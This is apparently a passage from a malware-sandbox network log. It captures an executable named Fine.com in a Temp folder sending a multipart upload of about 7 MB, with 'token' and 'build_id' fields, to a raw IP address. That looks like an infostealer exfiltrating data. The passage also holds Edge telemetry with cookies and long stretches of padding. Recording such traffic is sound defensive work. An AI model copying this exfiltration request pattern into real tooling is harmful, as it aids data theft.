                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:18 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          40192.168.2.55011413.89.179.134437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736698995943&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 9750
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0DA5835E35016A581E46962C34736B24; _EDGE_S=F=1&SID=20E67ACFE4B162710D046FBDE5F963E6; _EDGE_V=1; msnup=; _C_ETH=1
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC9750OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 32 54 31 36 3a 32 33 3a 31 35 2e 39 34 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 32 64 32 66 32 61 64 65 2d 38 37 38 61 2d 34 66 61 34 2d 39 62 33 31 2d 30 35 39 37 37 38 31 62 66 33 30 37 22 2c 22 65 70 6f 63 68 22 3a 22 37 34 37 34 34 35 36 34 30 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-12T16:23:15.942Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"2d2f2ade-878a-4fa4-9b31-0597781bf307","epoch":"747445640"},"app":{"loca
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:17 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=c892572238584695badfb691620a2ed3&HASH=c892&LV=202501&V=4&LU=1736698997487; Domain=.microsoft.com; Expires=Mon, 12 Jan 2026 16:23:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=99520254ba2e4ef48c821ac90bece4aa; Domain=.microsoft.com; Expires=Sun, 12 Jan 2025 16:53:17 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                          time-delta-millis: 1544
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:16 GMT
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          41192.168.2.550115195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC186OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----YM7YMOHLXBIEUAIMOP89
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 37 59 4d 4f 48 4c 58 42 49 45 55 41 49 4d 4f 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------YM7YMOHLXBIEUAIMOP89Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------YM7YMOHLXBIEUAIMOP89Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
